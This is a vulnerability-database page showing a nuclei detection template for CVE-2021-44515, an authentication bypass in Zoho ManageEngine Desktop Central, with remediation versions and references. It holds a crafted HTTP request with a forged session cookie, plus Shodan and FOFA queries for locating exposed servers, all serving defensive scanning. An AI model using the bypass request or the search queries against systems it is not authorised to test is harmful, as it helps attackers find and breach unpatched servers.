Lucene search

K

Zoho ManageEngine Desktop Central - Remote Code Execution

🗓️ 24 Apr 2022 10:25:12Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

Zoho ManageEngine Desktop Central - Remote Code Execution vulnerabilit

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
NVD
CVE-2021-44515
12 Dec 202105:15
nvd
NVD
CVE-2022-48362
25 Feb 202321:15
nvd
Vulnrichment
CVE-2021-44515
12 Dec 202104:04
vulnrichment
Cvelist
CVE-2021-44515
12 Dec 202104:04
cvelist
Cvelist
CVE-2022-48362
25 Feb 202300:00
cvelist
Check Point Advisories
Zoho ManageEngine Desktop Central Authentication Bypass (CVE-2021-44515)
16 Mar 202200:00
checkpoint_advisories
Tenable Nessus
ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)
6 Dec 202100:00
nessus
CNVD
Zoho ManageEngine Desktop Central MSP Licensing Issue Vulnerability
9 Dec 202100:00
cnvd
AttackerKB
CVE-2021-44515
21 Jan 202200:00
attackerkb
CVE
CVE-2021-44515
12 Dec 202105:15
cve
Rows per page
id: CVE-2021-44515

info:
  name: Zoho ManageEngine Desktop Central - Remote Code Execution
  author: Adam Crosser
  severity: critical
  description: Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.
  reference:
    - https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog
    - https://srcincite.io/blog/2022/01/20/zohowned-a-critical-authentication-bypass-on-zoho-manageengine-desktop-central.html
    - https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis
    - https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44515
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-44515
    cwe-id: CWE-287
    epss-score: 0.97233
    epss-percentile: 0.99811
    cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:enterprise:*:*:*
  metadata:
    max-request: 1
    vendor: zohocorp
    product: manageengine_desktop_central
    shodan-query: http.title:"manageengine desktop central 10"
    fofa-query:
      - title="manageengine desktop central 10"
      - app="zoho-manageengine-desktop"
    google-query: intitle:"manageengine desktop central 10"
  tags: cve2021,cve,zoho,rce,manageengine,kev,zohocorp

http:
  - raw:
      - |
        GET /STATE_ID/123/agentLogUploader HTTP/1.1
        Host: {{Hostname}}
        Cookie: STATE_COOKIE=&_REQS/_TIME/123

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "len(body) == 0"

      - type: word
        part: header
        words:
          - "UEMJSESSIONID="

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008ef1c5493af34ed72673fd6a1700312f319d704d03ec24a76fa4110b476d39ba02200603382c6d9557df078e327a7e0406d270a78289c3a1b8aa3f40e22b0d1cb167:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
24 Apr 2022 10:12Current
9.5High risk
Vulners AI Score9.5
CVSS210
CVSS39.8
EPSS0.972
29
.json
Report